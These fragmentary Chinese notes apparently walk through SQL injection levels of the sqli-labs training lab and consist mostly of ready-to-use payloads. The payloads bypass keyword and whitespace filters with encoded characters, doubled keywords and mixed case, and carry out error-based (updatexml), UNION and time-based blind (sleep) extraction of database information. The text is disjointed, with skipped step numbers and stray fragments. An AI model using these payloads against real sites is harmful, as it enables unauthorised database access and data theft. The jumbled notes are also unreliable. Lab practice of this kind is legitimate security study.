|| '1'='1或者;%00绕过。%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/%09、%0A、%0B、%0D、%2025%为百分号,%25A0就是空白符and、or等下列这些字符不区分大小写且用空格代替,于是想到利用双写绕过oorr,and也可以用%26%26来绕过,or可以用||来绕过。
?id=1' || updatexml(1,concat(0x7e,(database())),1) || '1' ='1
2. 由题目可知,本题采用盲注的思路,且闭合方式为')。
3.查看源码, 将打印的报错信息注释掉,因此只能考虑盲注
less 26相同。
?id=1' || updatexml(1,concat(0x7e,(database())),1) || '1'='1
使用与25关相同的思路——报错注入
5. 或者使用盲注思路、联合注入(大小写注入)。
6.
?id=999'%0AUNion%0ASElEct%0A1,2,3||'1'='1
less 26的方法1?id=999"%0AUNion%0ASElEct%0A1,2,3||'1'='1 //联合注入
?id=999" %26%26 if(length(database())>9,1,sleep(10)) %26%26 %0a '1'='1 //盲注
')
/?id=111') %a0 union%a0 select %a0 1,2,3 || '1'='1 //联合注入
/?id=111') %a0 union%a0 select %a0 1,2,3 %26%26 '1'='1
/?id=111') %a0 union%a0 select %a0 1,2,3 || ('1')=('1
/?id=1') %a0 %26%26 if(length(database())>9,1,sleep(5));%00 //基于时间的盲注
?id=1') Union SElect 1,2,3--+
?id=111')%a0Union%a0%a0SElect 1,2,3--+
?id=1')%a0and%a0if(length(database())>9,1,sleep(5))--+